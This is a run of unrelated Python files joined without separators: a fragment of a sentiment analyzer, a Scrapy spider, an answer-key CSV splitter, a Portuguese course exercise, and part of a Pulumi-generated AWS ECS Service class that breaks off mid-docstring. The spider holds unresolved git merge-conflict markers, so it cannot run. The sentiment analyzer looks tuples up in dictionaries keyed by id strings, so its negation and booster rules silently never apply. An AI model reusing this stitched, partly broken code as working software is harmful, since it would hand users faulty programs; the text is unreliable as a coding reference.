{'i18282', 'i18284', 'i18436', #no 'i2944', # neither 'i18262', 'i18263', # never 'i12559', 'i18285', # none 'i18280', # not 'i18281', # nothing ## NOT 'i109082', 'i18289', # nowhere # FCB does this help? 'i18348', # rarely, seldom } # missing contracted auxiliaries and without, nope, uh-uh, uhuh, nor neg_dict = dict.fromkeys(negators, "-0.74") boosters = {'i18320', #very 'i18185', 'i18187', 'i18188', 'i18194', 'i18197', 'i18198', 'i18199', 'i18202', 'i18207', 'i18225', 'i18249', 'i18250', 'i18251', 'i18252', 'i18259', 'i18260', 'i18270', 'i18287', 'i18320', 'i18321', 'i18324', 'i18325', 'i18344', 'i18345', 'i18356', 'i18357', 'i18359', 'i18361', 'i18368', 'i18370', 'i18390', 'i18410', 'i18413', 'i18414', 'i18424', 'i18465', 'i18466', 'i18474', 'i18475', 'i18480', 'i18481', 'i18493', 'i18494', 'i18495', 'i18533', 'i18578', 'i18629', 'i18648', 'i18654', 'i18656', 'i18689', 'i18690', 'i18691', 'i18748', 'i18760', 'i18762', 'i18776', 'i18815', 'i18846', 'i18849', 'i18888', 'i18889', 'i18890', 'i18894', 'i18907', 'i18911', 'i19062', 'i19066', 'i19112', 'i19124', 'i19125', 'i19126', 'i19127', 'i19128', 'i19129', 'i19142', 'i19207', 'i19322', 'i19332', 'i19334', 'i19335', 'i19351', 'i19359', 'i19362', 'i19363', 'i19364', 'i19386', 'i19401', 'i19433', 'i19453', 'i19476', 'i19486', 'i19495', 'i19535', 'i19587', 'i19588', 'i19612', 'i19619', 'i19671', 'i19683', 'i19685', 'i19688', 'i19689', 'i19690', 'i19692', 'i19827', 'i19843', 'i19856', 'i19857', 'i20139', 'i20140', 'i20206', 'i20266', 'i20267', 'i20268', 'i20361', 'i20362', 'i20446', 'i20602', 'i20603', 'i20604', 'i20605', 'i20659', 'i20673', 'i20733', 'i20740', 'i20795', 'i20807', 'i20968', 'i21036', 'i21086', 'i21281', 'i21647', 'i21657', 'i21666', 'i21667', 'i21670', 'i21714', 'i21720', 'i18163', 'i18581', #barely 'i78', 'i1206', 'i1265', 'i1845', 'i2472', 'i3300', 'i3912', 'i4698', 'i4840', 'i4955', 'i5422', 'i5850', 'i6188', 'i6595', 'i6635', 'i6653', 'i6989', 'i6991', 'i7021', 'i7579', 'i7599', 'i7722', 'i7819', 'i7963', 'i7964', 'i8033', 'i8056', 'i8058', 'i8060', 'i8062', 'i8064', 'i8067', 'i8068', 'i8071', 'i8208', 'i8218', 'i8284', 'i8287', 'i8410', 'i8418', 'i8524', 'i8526', 'i8527', 'i8531', 'i8534', 'i8535', 'i8536', 'i8537', 'i8540', 'i8541', 'i8542', 'i8544', 'i9030', 'i9195', 'i9442', 'i10123', 'i10228', 'i10278', 'i10380', 'i10381', 'i10676', 'i10739', 'i11517', 'i11891', 'i11893', 'i12239', 'i12344', 'i12553', 'i12941', 'i12963', 'i13000', 'i13214', 'i13296', 'i14223', 'i18163', 'i18165', 'i18177', 'i18181', 'i18187', 'i18193', 'i18195', 'i18198', 'i18208', 'i18209', 'i18210', 'i18248', 'i18250', 'i18264', 'i18302', 'i18332', 'i18333', 'i18350', 'i18352', 'i18477', 'i18578', 'i18581', 'i18582', 'i18694', 'i18757', 'i18760', 'i18761', 'i18762', 'i18763', 'i18764', 'i18812', 'i18873', 'i19191', 'i19229', 'i19623', 'i19691', 'i19749', 'i20135', 'i20838', 'i20839', 'i21309', 'i21658', 'i21674' } boost_dict = dict.fromkeys(boosters, "0.293") #@staticmethod def increment(valence, increment): """ increment in the same direction as the valence """ if valence == 0.0: return valence elif valence > 0: return valence + increment else: # valence < 0 return valence - increment #@staticmethod def stretch(valence, increment): """ stretch the valence """ return valence * increment def normalize(score, alpha=15): """ Normalize the score to be between -1 and 1 using an alpha that approximates the max expected value """ norm_score = score / math.sqrt((score * score) + alpha) if norm_score < -1.0: return -1.0 elif norm_score > 1.0: return 1.0 else: return norm_score def allcap_differential(words): """ Check whether just some words in the input are ALL CAPS :param list words: The words to inspect :returns: `True` if some but not all items in `words` are ALL CAPS """ is_different = False allcap_words = 0 for word in words: if word.isupper(): allcap_words += 1 cap_differential = len(words) - allcap_words if 0 < cap_differential < len(words): is_different = True return is_different def _sift_sentiment_scores(sentiments): # want separate positive versus negative sentiment scores pos_sum = 0.0 neg_sum = 0.0 neu_count = 0 for sentiment_score in sentiments: if sentiment_score > 0: pos_sum += (float(sentiment_score) + 1) # compensates for neutral words that are counted as 1 elif sentiment_score < 0: neg_sum += (float(sentiment_score) - 1) # when used with math.fabs(), compensates for neutrals else: # sentiment_score == 0: neu_count += 1 return pos_sum, neg_sum, neu_count def score_valence(sentiments, punct_emph_amplifier): if sentiments: sum_s = float(sum(sentiments)) # compute and add emphasis from punctuation in text sum_s = increment(sum_s, punct_emph_amplifier) compound = normalize(sum_s) # discriminate between positive, negative and neutral sentiment scores pos_sum, neg_sum, neu_count = _sift_sentiment_scores(sentiments) if pos_sum > math.fabs(neg_sum): pos_sum += punct_emph_amplifier elif pos_sum < math.fabs(neg_sum): neg_sum -= punct_emph_amplifier total = pos_sum + math.fabs(neg_sum) + neu_count pos = math.fabs(pos_sum / total) neg = math.fabs(neg_sum / total) neu = math.fabs(neu_count / total) else: compound = 0.0 pos = 0.0 neg = 0.0 neu = 0.0 sentiment_dict = \ {"neg": round(neg, 3), "neu": round(neu, 3), "pos": round(pos, 3), "compound": round(compound, 4)} return sentiment_dict def _amplify_ep(text): """ check for added emphasis resulting from exclamation points (up to 4 of them) """ ep_count = text.count("!") if ep_count > 4: ep_count = 4 # (empirically derived mean sentiment intensity rating increase for # exclamation points) ep_amplifier = ep_count * 0.292 return ep_amplifier def _amplify_qm(text): """ check for added emphasis resulting from question marks (2 or 3+) """ qm_count = text.count("?") qm_amplifier = 0 if qm_count > 1: if qm_count <= 3: # (empirically derived mean sentiment intensity rating increase for # question marks) qm_amplifier = qm_count * 0.18 else: qm_amplifier = 0.96 return qm_amplifier def punctuation_emphasis(text): # add emphasis from exclamation points and question marks ep_amplifier = _amplify_ep(text) qm_amplifier = _amplify_qm(text) punct_emph_amplifier = ep_amplifier + qm_amplifier return punct_emph_amplifier class SentimentAnalyzer(object): """ Give a sentiment intensity score to sentences. """ def __init__(self, model="en_sense"): modpath = f"{__package__}.models.{model}" datapath = f"{__package__}.data" self.meta = self.read_meta(modpath, 'meta.yaml') ### Valence lexicons self.lexicon = dict() for lexfile in self.meta['lexicons']: self.lexicon.update(self.make_lex_dict(modpath, lexfile)) print(f"loaded model {model}") ### def read_meta(self, modpath, meta_file): """ Read meta parameters for the model """ with open_text(modpath, meta_file) as metafh: meta = yaml.safe_load(metafh) return meta def make_lex_dict(self, modpath, lexicon_file): """ Convert lexicon file to a dictionary Expect a tab separated lexicon lemma score rest Allow comments with hashes """ lex_dict = {} fh = open_text(modpath, lexicon_file) for line in fh: line = line.strip() if not line or line.startswith('#'): continue (word, measure) = line.strip().split('\t')[0:2] lex_dict[word] = float(measure) return lex_dict def lexical_valence(self, w, p, l, t): """ find the lexical valence apply any morphological changes """ if t in self.lexicon: valence = self.lexicon[t] if valence: if p == 'JJR': # comparative valence = increment(valence, COMP_INCR) elif p == 'JJS': # superlative valence = increment(valence, SUPR_INCR) return valence def sentiment_valence(self, i, senses, is_cap_diff): valence = 0.0 (w, p, l, t) = senses[i] ### get the base valence, with morphological changes if t in self.lexicon: valence = self.lexical_valence(w, p, l, t) ### CAPITALIZATION if valence and is_cap_diff and \ w.isupper() and not l.isupper(): valence = increment(valence, C_INCR) return valence def polarity_scores(self, text): """ Return a float for sentiment strength based on the input text. Positive values are positive valence, negative value are negative valence. """ senses = disambiguate(text, en, morphy) print(senses) is_cap_diff = allcap_differential([w for (w, p, l, t) in senses]) ### pad with beginners? sentiments = list() for i, (w, p, l, t) in enumerate(senses): #position, word, pos, lemma, i-tag local = self.sentiment_valence(i, senses, is_cap_diff) if i > 1 and (senses[i-1] in boost_dict): #add -B_INCR to boosters itself local = increment(local, B_INCR) if i > 2 and (senses[i-2] in boost_dict): local = increment(local, B_INCR*0.95) if i > 3 and (senses[i-3] in boost_dict): local = increment(local, B_INCR*0.9) if i > 1 and (senses[i-1] in neg_dict): local = stretch(local,N_SCALAR) if i > 2 and (senses[i-2] in neg_dict): local = stretch(local,N_SCALAR) if i > 3 and (senses[i-3] in neg_dict): local = stretch(local,N_SCALAR) sentiments.append(local) punct_score = punctuation_emphasis(text) valence_dict = score_valence(sentiments, punct_score) print(sentiments) return valence_dict # if __name__ == '__main__': # sentences = ["VADER is smart, handsome, and funny.", # "We have some problems."] # analyzer = SentimentAnalyzer() 1695652161/Spider_Armiesquotes.toscrape.com/tutorial/tutorial/spiders/quotes.py from typing import Counter import scrapy from tutorial.items import QuoteItem from scrapy.http.request import Request class QuotesSpider(scrapy.Spider): # 爬虫名称, 唯一的 name = 'quotes' # 请求url非该域名则过滤 # allowed_domains = ['quotes.toscrape.com'] # is_open_count = True # count = 0 # MAX = 5 custom_settings = { <<<<<<< HEAD "CONCURRENT_REQUESTS": 6, "DOWNLOAD_DELAY": 0, 'tutorial.middlewares.TutorialDownloaderMiddleware': 543, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'tutorial.middlewares.TutorialRetryMiddleware': 550, } start_urls = [ 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', 'http://httpbin.org/ip', ] # start_urls = [ # # 'http://quotes.toscrape.com/page/1/', # # 'http://quotes.toscrape.com/page/2/', # # 'http://quotes.toscrape.com/page/3/', # # 'http://quotes.toscrape.com/page/4/', # # 'http://quotes.toscrape.com/page/5/', # # 'http://quotes.toscrape.com/page/6/', # # 'http://quotes.toscrape.com/page/7/', # # 'http://quotes.toscrape.com/page/8/', # # 'http://quotes.toscrape.com/page/9/', # # 'http://quotes.toscrape.com/page/10/', # # 'http://quotes.toscrape.com/page/11/', # # 'http://quotes.toscrape.com/page/12/', # # 'http://quotes.toscrape.com/page/13/', # # 'http://quotes.toscrape.com/page/14/', # # 'http://quotes.toscrape.com/page/15/', # # 'http://quotes.toscrape.com/page/16/', # # 'http://quotes.toscrape.com/page/17/', # # 'https://www.correos.cl/', # # 'https://www.correos.cl/', # # 'https://www.correos.cl/', ======= "CONCURRENT_REQUESTS": 4, "DOWNLOAD_DELAY":0.5, } start_urls = [ 'http://httpbin.org/ip#1/', 'http://httpbin.org/ip#2/', 'http://httpbin.org/ip#3/', 'http://httpbin.org/ip#4/', 'http://httpbin.org/ip#5/', 'http://httpbin.org/ip#6/', 'http://httpbin.org/ip#7/', 'http://httpbin.org/ip#8/', 'http://httpbin.org/ip#9/', 'http://httpbin.org/ip#10/', 'http://httpbin.org/ip#11/', 'http://httpbin.org/ip#12/', 'http://httpbin.org/ip#13/', 'http://httpbin.org/ip#14/', 'http://httpbin.org/ip#15/', 'http://httpbin.org/ip#16/', 'http://httpbin.org/ip#17/', 'http://httpbin.org/ip#17/', 'http://httpbin.org/ip#18/', 'http://httpbin.org/ip#19/', 'http://httpbin.org/ip#20/', 'http://httpbin.org/ip#21/', ] # start_urls = [ # 'http://quotes.toscrape.com/page/1/', # 'http://quotes.toscrape.com/page/2/', # 'http://quotes.toscrape.com/page/3/', # 'http://quotes.toscrape.com/page/4/', # 'http://quotes.toscrape.com/page/5/', # 'http://quotes.toscrape.com/page/6/', # 'http://quotes.toscrape.com/page/7/', # 'http://quotes.toscrape.com/page/8/', # 'http://quotes.toscrape.com/page/9/', # 'http://quotes.toscrape.com/page/10/', # 'http://quotes.toscrape.com/page/11/', # 'http://quotes.toscrape.com/page/12/', # 'http://quotes.toscrape.com/page/13/', # 'http://quotes.toscrape.com/page/14/', # 'http://quotes.toscrape.com/page/15/', # 'http://quotes.toscrape.com/page/16/', # 'http://quotes.toscrape.com/page/17/', # 'https://www.correos.cl/', # 'https://www.correos.cl/', # 'https://www.correos.cl/', >>>>>>> 0b240f3f443ce7cf1346e781b65bff5ca72101fb # ] def parse(self, response): item = QuoteItem() item['url'] = response.url item['data'] = response.body.decode() # print(response.body.decode()) return item import csv import json from pathlib import Path # This script creates the site-specific answer key CSVs out of the overall answer_key JSON. # It iterates over the json and breaks out people based on which site they belong to. # The columns of the CSV are just the 4 fields from the objects in the JSON. # Note that nothing actually uses the file_name so it could be stripped for file size if necessary. answer_key = Path("../temp-data/answer_key.json") sites = ['a', 'b', 'c', 'd', 'e', 'f'] site_ids = {} for site in sites: site_ids[site] = set() pii_file = Path(f"../temp-data/pii_site_{site}.csv") with open(pii_file) as pii_csv: pii_reader = csv.reader(pii_csv) # Skips header next(pii_reader) for row in pii_reader: site_ids[site].add(row[0]) HEADER = ["record_id", "seed_record_id", "household_id", "file_name"] new_answer_key = [] with open(answer_key) as f: d = json.load(f) # { # "14444032-081e-92ac-47dd-eafdbce66365": [ # { # "record_id": "19029", # "seed_record_id": "19028", # "household_id": "3879064", # "file_name": "Andrew_Nikla_Denbraber_14444032-081e-92ac-47dd-eafdbce663652.json" # }, # { # "record_id": "19030", # "seed_record_id": "19028", # "household_id": "3879064", # "file_name": "Dr_Andrew_Denbraber_14444032-081e-92ac-47dd-eafdbce663650.json" # }, # { # "record_id": "19029", # "seed_record_id": "19028", # "household_id": "3879064", # "file_name": "Andrew_Nikla_Denbraber_14444032-081e-92ac-47dd-eafdbce663651.json" # } # ], for household in d.values(): for record in household: record_id = record['record_id'] seed_record_id = record['seed_record_id'] household_id = record['household_id'] file_name = record['file_name'] key_line = [record_id, seed_record_id, household_id, file_name] new_answer_key.append(key_line) for site in sites: csv_out_path = Path(f"../temp-data/site_{site}_key.csv") with open(csv_out_path, "w", newline="", encoding="utf-8") as answer_key_csv: writer = csv.writer(answer_key_csv) writer.writerow(HEADER) for output_row in new_answer_key: if output_row[0] in site_ids[site]: writer.writerow(output_row) fabiosabariego/curso-python0 """ Crie um pacote chamado utilidadesCeV que tenha 2 módulos internos chamados moeda e dado. Transfira as funções utilizadas no ex110 para o primeiro pacote e mantenha tudo funcionando """ from ex111.utilidadesCeV import moeda p = float(input('Digite o Preço: R$')) moeda.resumo(p, 80, 35)# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from .. import _utilities, _tables from . import outputs from ._inputs import * __all__ = ['Service'] class Service(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, capacity_provider_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]]] = None, cluster: Optional[pulumi.Input[str]] = None, deployment_controller: Optional[pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']]] = None, deployment_maximum_percent: Optional[pulumi.Input[int]] = None, deployment_minimum_healthy_percent: Optional[pulumi.Input[int]] = None, desired_count: Optional[pulumi.Input[int]] = None, enable_ecs_managed_tags: Optional[pulumi.Input[bool]] = None, enable_execute_command: Optional[pulumi.Input[bool]] = None, force_new_deployment: Optional[pulumi.Input[bool]] = None, health_check_grace_period_seconds: Optional[pulumi.Input[int]] = None, iam_role: Optional[pulumi.Input[str]] = None, launch_type: Optional[pulumi.Input[str]] = None, load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]]] = None, name: Optional[pulumi.Input[str]] = None, network_configuration: Optional[pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']]] = None, ordered_placement_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]]] = None, placement_constraints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]]] = None, platform_version: Optional[pulumi.Input[str]] = None, propagate_tags: Optional[pulumi.Input[str]] = None, scheduling_strategy: Optional[pulumi.Input[str]] = None, service_registries: Optional[pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, task_definition: Optional[pulumi.Input[str]] = None, wait_for_steady_state: Optional[pulumi.Input[bool]] = None, __props__=None, __name__=None, __opts__=None): """ > **Note:** To prevent a race condition during service deletion, make sure to set `depends_on` to the related `iam.RolePolicy`; otherwise, the policy may be destroyed too soon and the ECS service will then get stuck in the `DRAINING` state. Provides an ECS service - effectively a task that is expected to run until an error occurs or a user terminates it (typically a webserver or a database). See [ECS Services section in AWS developer guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html). ## Example Usage ```python import pulumi import pulumi_aws as aws mongo = aws.ecs.Service("mongo", cluster=aws_ecs_cluster["foo"]["id"], task_definition=aws_ecs_task_definition["mongo"]["arn"], desired_count=3, iam_role=aws_iam_role["foo"]["arn"], ordered_placement_strategies=[aws.ecs.ServiceOrderedPlacementStrategyArgs( type="binpack", field="cpu", )], load_balancers=[aws.ecs.ServiceLoadBalancerArgs( target_group_arn=aws_lb_target_group["foo"]["arn"], container_name="mongo", container_port=8080, )], placement_constraints=[aws.ecs.ServicePlacementConstraintArgs( type="memberOf", expression="attribute:ecs.availability-zone in [us-west-2a, us-west-2b]", )], opts=pulumi.ResourceOptions(depends_on=[aws_iam_role_policy["foo"]])) ``` ### Ignoring Changes to Desired Count You can use [`ignoreChanges`](https://www.pulumi.com/docs/intro/concepts/programming-model/#ignorechanges) to create an ECS service with an initial count of running instances, then ignore any changes to that count caused externally (e.g. Application Autoscaling). ```python import pulumi import pulumi_aws as aws # ... other configurations ... example = aws.ecs.Service("example", desired_count=2) ``` ### Daemon Scheduling Strategy ```python import pulumi import pulumi_aws as aws bar = aws.ecs.Service("bar", cluster=aws_ecs_cluster["foo"]["id"], task_definition=aws_ecs_task_definition["bar"]["arn"], scheduling_strategy="DAEMON") ``` ### External Deployment Controller ```python import pulumi import pulumi_aws as aws example = aws.ecs.Service("example", cluster=aws_ecs_cluster["example"]["id"], deployment_controller=aws.ecs.ServiceDeploymentControllerArgs( type="EXTERNAL", )) ``` ## Import ECS services can be imported using the `name` together with ecs cluster `name`, e.g. ```sh $ pulumi import aws:ecs/service:Service imported cluster-name/service-name ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]] capacity_provider_strategies: The capacity provider strategy to use for the service. Can be one or more. Defined below. :param pulumi.Input[str] cluster: ARN of an ECS cluster :param pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']] deployment_controller: Configuration block containing deployment controller configuration. Defined below. :param pulumi.Input[int] deployment_maximum_percent: The upper limit (as a percentage of the service's desiredCount) of the number of running tasks that can be running in a service during a deployment. Not valid when using the `DAEMON` scheduling strategy. :param pulumi.Input[int] deployment_minimum_healthy_percent: The lower limit (as a percentage of the service's desiredCount) of the number of running tasks that must remain running and healthy in a service during a deployment. :param pulumi.Input[int] desired_count: The number of instances of the task definition to place and keep running. Defaults to 0. Do not specify if using the `DAEMON` scheduling strategy. :param pulumi.Input[bool] enable_ecs_managed_tags: Specifies whether to enable Amazon ECS managed tags for the tasks within the service. :param pulumi.Input[bool] enable_execute_command: Specifies whether to enable Amazon ECS Exec for the tasks within the service. :param pulumi.Input[bool] force_new_deployment: Enable to force a new task deployment of the service. This can be used to update tasks to use a newer Docker image with same image/tag combination (e.g. `myimage:latest`), roll Fargate tasks onto a newer platform version, or immediately deploy `ordered_placement_strategy` and `placement_constraints` updates. :param pulumi.Input[int] health_check_grace_period_seconds: Seconds to ignore failing load balancer health checks on newly instantiated tasks to prevent premature shutdown, up to 2147483647. Only valid for services configured to use load balancers. :param pulumi.Input[str] iam_role: ARN of the IAM role that allows Amazon ECS to make calls to your load balancer on your behalf. This parameter is required if you are using a load balancer with your service, but only if your task definition does not use the `awsvpc` network mode. If using `awsvpc` network mode, do not specify this role. If your account has already created the Amazon ECS service-linked role, that role is used by default for your service unless you specify a role here. :param pulumi.Input[str] launch_type: The launch type on which to run your service. The valid values are `EC2` and `FARGATE`. Defaults to `EC2`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]] load_balancers: A load balancer block. Load balancers documented below. :param pulumi.Input[str] name: The name of the service (up to 255 letters, numbers, hyphens, and underscores) :param pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']] network_configuration: The network configuration for the service. This parameter is required for task definitions that use the `awsvpc` network mode to receive their own Elastic Network Interface, and it is not supported for other network modes. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]] ordered_placement_strategies: Service level strategy rules that are taken into consideration during task placement. List from top to bottom in order of precedence. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. The maximum number of `ordered_placement_strategy` blocks is `5`. Defined below. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]] placement_constraints: rules that are taken into consideration during task placement. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. Maximum number of `placement_constraints` is `10`. Defined below. :param pulumi.Input[str] platform_version: The platform version on which to run your service. Only applicable for `launch_type` set to `FARGATE`. Defaults to `LATEST`. More information about Fargate platform versions can be found in the [AWS ECS User Guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/platform_versions.html). :param pulumi.Input[str] propagate_tags: Specifies whether to propagate the tags from the task definition or the service to the tasks. The valid values are `SERVICE` and `TASK_DEFINITION`. :param pulumi.Input[str] scheduling_strategy: The scheduling strategy to use for the service. The valid values are `REPLICA` and `DAEMON`. Defaults to `REPLICA`. Note that [*Tasks using the Fargate launch type or the `CODE_DEPLOY` or `EXTERNAL` deployment controller types don't support the `DAEMON` scheduling strategy*](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_CreateService.html). :param pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']] service_registries: The service discovery registries for the service. The maximum number of `service_registries` blocks is `1`. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags :param pulumi.Input[str] task_definition: The family and revision (`family:revision`) or full ARN of the task definition that you want to run in your service. Required unless using the `EXTERNAL` deployment controller. If a revision is not specified, the latest `ACTIVE` revision is used. :param pulumi.Input[bool] wait_for_steady_state: If `true`, the provider will wait for the service to reach a steady state (like `aws ecs wait services-stable`) before continuing. Default `false`. """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() __props__['capacity_provider_strategies'] = capacity_provider_strategies __props__['cluster'] = cluster __props__['deployment_controller'] = deployment_controller __props__['deployment_maximum_percent'] = deployment_maximum_percent __props__['deployment_minimum_healthy_percent'] = deployment_minimum_healthy_percent __props__['desired_count'] = desired_count __props__['enable_ecs_managed_tags'] = enable_ecs_managed_tags __props__['enable_execute_command'] = enable_execute_command __props__['force_new_deployment'] = force_new_deployment __props__['health_check_grace_period_seconds'] = health_check_grace_period_seconds __props__['iam_role'] = iam_role __props__['launch_type'] = launch_type __props__['load_balancers'] = load_balancers __props__['name'] = name __props__['network_configuration'] = network_configuration __props__['ordered_placement_strategies'] = ordered_placement_strategies __props__['placement_constraints'] = placement_constraints __props__['platform_version'] = platform_version __props__['propagate_tags'] = propagate_tags __props__['scheduling_strategy'] = scheduling_strategy __props__['service_registries'] = service_registries __props__['tags'] = tags __props__['task_definition'] = task_definition __props__['wait_for_steady_state'] = wait_for_steady_state super(Service, __self__).__init__( 'aws:ecs/service:Service', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, capacity_provider_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]]] = None, cluster: Optional[pulumi.Input[str]] = None, deployment_controller: Optional[pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']]] = None, deployment_maximum_percent: Optional[pulumi.Input[int]] = None, deployment_minimum_healthy_percent: Optional[pulumi.Input[int]] = None, desired_count: Optional[pulumi.Input[int]] = None, enable_ecs_managed_tags: Optional[pulumi.Input[bool]] = None, enable_execute_command: Optional[pulumi.Input[bool]] = None, force_new_deployment: Optional[pulumi.Input[bool]] = None, health_check_grace_period_seconds: Optional[pulumi.Input[int]] = None, iam_role: Optional[pulumi.Input[str]] = None, launch_type: Optional[pulumi.Input[str]] = None, load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]]] = None, name: Optional[pulumi.Input[str]] = None, network_configuration: Optional[pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']]] = None, ordered_placement_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]]] = None, placement_constraints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]]] = None, platform_version: Optional[pulumi.Input[str]] = None, propagate_tags: Optional[pulumi.Input[str]] = None, scheduling_strategy: Optional[pulumi.Input[str]] = None, service_registries: Optional[pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, task_definition: Optional[pulumi.Input[str]] = None, wait_for_steady_state: Optional[pulumi.Input[bool]] = None) -> 'Service': """ Get an existing Service resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]] capacity_provider_strategies: The capacity provider strategy to use for the service. Can be one or more. Defined below. :param pulumi.Input[str] cluster: ARN of an ECS cluster :param pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']] deployment_controller: Configuration block containing deployment controller configuration. Defined below. :param pulumi.Input[int] deployment_maximum_percent: The upper limit (as a percentage of the service's desiredCount) of the number of running tasks that can be running in a service during a deployment. Not valid when using the `DAEMON` scheduling strategy. :param pulumi.Input[int] deployment_minimum_healthy_percent: The lower limit (as a percentage of the service's desiredCount) of the number of running tasks that must remain running and healthy in a service during a deployment. :param pulumi.Input[int] desired_count: The number of instances of the task definition to place and keep running. Defaults to 0. Do not specify if using the `DAEMON` scheduling strategy. :param pulumi.Input[bool] enable_ecs_managed_tags: Specifies whether to enable Amazon ECS managed tags for the tasks within the service. :param pulumi.Input[bool] enable_execute_command: Specifies whether to enable Amazon ECS Exec for the tasks within the service. :param pulumi.Input[bool] force_new_deployment: Enable to force a new task deployment of the service. This can be used to update tasks to use a newer Docker image with same image/tag combination (e.g. `myimage:latest`), roll Fargate tasks onto a newer platform version, or immediately deploy `ordered_placement_strategy` and `placement_constraints` updates. :param pulumi.Input[int] health_check_grace_period_seconds: Seconds to ignore failing load balancer health checks on newly instantiated tasks to prevent premature shutdown, up to 2147483647. Only valid for services configured to use load balancers. :param pulumi.Input[str] iam_role: ARN of the IAM role that allows Amazon ECS to make calls to your load balancer on your behalf. This parameter is required if you are using a load balancer with your service, but only if your task definition does not use the `awsvpc` network mode. If using `awsvpc` network mode, do not specify this role. If your account has already created the Amazon ECS service-linked role, that role is used by default for your service unless you specify a role here. :param pulumi.Input[str] launch_type: The launch type on which to run your service. The valid values are `EC2` and `FARGATE`. Defaults to `EC2`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]] load_balancers: A load balancer block. Load balancers documented below. :param pulumi.Input[str] name: The name of the service (up to 255 letters, numbers, hyphens, and underscores) :param pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']] network_configuration: The network configuration for the service. This parameter is required for task definitions that use the `awsvpc` network mode to receive their own Elastic Network Interface, and it is not supported for other network modes. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]] ordered_placement_strategies: Service level strategy rules that are taken into consideration during task placement. List from top to bottom in order of precedence. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. The maximum number of `ordered_placement_strategy` blocks is `5`. Defined below. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]] placement_constraints: rules that are taken into consideration during task placement. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. Maximum number of `placement_constraints` is `10`. Defined below. :param pulumi.Input[str] platform_version: The platform version on which to run your service. Only applicable for `launch_type` set to `FARGATE`. Defaults to `LATEST`. More information about Fargate platform versions can be found in the [AWS ECS User Guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/platform_versions.html). :param pulumi.Input[str] propagate_tags: Specifies whether to propagate the tags from the task definition or the service to the tasks. The valid values are `SERVICE` and `TASK_DEFINITION`. :param pulumi.Input[str] scheduling_strategy: The scheduling strategy to use for the service. The valid values are `REPLICA` and `DAEMON`. Defaults to `REPLICA`. Note that [*Tasks using the Fargate launch type or the `CODE_DEPLOY` or `EXTERNAL` deployment controller types don't support the `DAEMON` scheduling 